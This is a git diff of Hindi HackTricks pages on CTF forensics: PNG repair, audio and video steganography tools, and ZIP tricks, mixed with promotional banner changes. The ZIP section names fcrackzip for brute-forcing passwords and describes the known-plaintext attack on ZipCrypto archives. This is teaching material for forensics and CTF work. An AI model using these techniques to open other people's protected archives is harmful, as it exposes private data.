* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं: कुछ चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
## echo ## echo
```bash ```bash
@ -52,16 +53,17 @@ End With
End Function End Function
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** PRs को **HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,33 +1,35 @@
<details> {% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> **GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>
**PNG फ़ाइलें** **CTF challenges** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिससे वे छिपी हुई डेटा को एम्बेड करने के लिए आदर्श होती हैं। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छिपे हुए जानकारी या असमान्यताएँ प्रकट करते हैं।
PNG फ़ाइल की अखंडता की जाँच और क्षति को ठीक करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएँ एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNGs को मरम्मत करने** में, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छिपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्त करने में मदद करती हैं।
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 **डिस्कॉर्ड समूह** (https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** (https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
**PNG फ़ाइलें** **CTF चैलेंज** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिन्हें छुपी डेटा को एम्बेड करने के लिए आदर्श बनाया गया है। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छुपे जानकारी या विसंगतियों को प्रकट करते हैं।
PNG फ़ाइल की अखंडता की जाँच करने और क्षति को मरम्मत करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो ऑनलाइन सेवाएं जैसे [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) कोरप्टेड PNG की मरम्मत के लिए एक वेब-आधारित समाधान प्रदान करती हैं, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छुपे या खोए गए डेटा को खोजने और पुनर्प्राप्त करने में मदद करती हैं।
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 **डिस्कॉर्ड समूह** (https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** (https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -1,40 +1,14 @@
<details> {% hint style="success" %}
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक मुख्य तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग करके गुप्त संदेशों को छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं।
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण करने के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ को खोजने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गाने को धीमा करना या उलटा करना छिपे संदेशों का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
HackTricks का समर्थन करने के अन्य तरीके: **कम सांकेतिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का शोषण करता है ताकि डेटा को गुप्त रूप से समाहित किया जा सके। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! वीडियो चैलेंज अक्सर ऑडियो और वीडियो स्ट्रीम्स को बंडल करने वाले कंटेनर फ़ॉर्मेट्स को शामिल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेट्स का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को दर्शाता है, जहां प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा को खोलने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक महत्वपूर्ण तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं। ## संदर्भ
ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गानों को धीमा करना या उलटना छुपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
**कम सार्वजनिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग गुप्त रूप से डेटा समाहित करने के लिए करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
वीडियो चैलेंज अक्सर कंटेनर फ़ॉर्मेट का सामाग्री जोड़ने वाले होते हैं जो ऑडियो और वीडियो स्ट्रीम्स को बंडल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेटों का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को प्रकट करता है, जहाँ प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा का पता लगाने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
# संदर्भ
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
{% endhint %}
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -1,27 +1,46 @@
# ZIPs tricks # ZIPs ट्रिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रिपॉसिटरी में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
**कमांड लाइन उपकरण** जो **ज़िप फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं जो ज़िप फ़ाइलें निदान, मरम्मत और क्रैकिंग के लिए हैं। यहाँ कुछ मुख्य उपयोगी उपकरण हैं: **कमांड-लाइन टूल्स** जो **zip फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं, zip फ़ाइलें का निदान करने, मरम्मत करने, और क्रैक करने के लिए। यहाँ कुछ मुख्य उपयोगी उपकरण हैं:
- **`unzip`**: बताता है कि ज़िप फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है। - **`unzip`**: बताता है कि एक zip फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है।
- **`zipdetails -v`**: ज़िप फ़ाइल प्रारूप क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है। - **`zipdetails -v`**: zip फ़ाइल प्रारूप के क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है।
- **`zipinfo`**: ज़िप फ़ाइल की सामग्री की सूची बनाता है बिना उन्हें निकाले - **`zipinfo`**: उन्हें निकाले बिना zip फ़ाइल की सामग्री की सूची देता है
- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त ज़िप फ़ाइलों को मरम्मत करने की कोशिश करें। - **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त zip फ़ाइलों को मरम्मत करने का प्रयास करें।
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: ज़िप पासवर्ड की ब्रूट-फोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है। - **[fcrackzip](https://github.com/hyc/fcrackzip)**: zip पासवर्ड का ब्रूट-फ़ोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 वर्णों तक के पासवर्ड के लिए प्रभावी है।
[ज़िप फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) ज़िप फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है। [Zip फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) zip फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है।
महत्वपूर्ण नोट: पासवर्ड से सुरक्षित ज़िप फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार नहीं एन्क्रिप्ट** करती हैं, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करती हैं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई ज़िप फ़ाइलें एक **प्लेनटेक्स्ट हमले** के लिए संवेदनशील हैं यदि किसी अनएन्क्रिप्टेड कॉपी की उपलब्ध है। एक उपलब्ध फ़ाइल का ज्ञात सामग्री का उपयोग करके ज़िप का पासवर्ड क्रैक करने के लिए यह हमला किया जा सकता है, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई ज़िप फ़ाइलें इस प्लेनटेक्स्ट हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विध महत्वपूर्ण है कि पासवर्ड से सुरक्षित zip फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार एन्क्रिप्ट नहीं करतीं**, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करतीं जो इस सूचना को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई zip फ़ाइलें एक **सादाकथन हमला** के लिए विकल्पशील हैं अगर किसी अनएन्क्रिप्टेड कॉपी की एक कम्प्रेस्ड फ़ाइल उपलब्ध है। यह हमला जानी गई सामग्री का उपयोग करता है ताकि zip का पासवर्ड क्रैक किया जा सके, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई zip फ़ाइलें इस सादाकथन हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विधियों का चयन करने की महत्वता को प्रदर्शित करती है।
## संदर्भ
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रिपॉसिटरी में।
</details>
{% endhint %}

View file

@ -2,19 +2,20 @@
## Windows आर्टिफैक्ट्स ## Windows आर्टिफैक्ट्स
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके**.
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
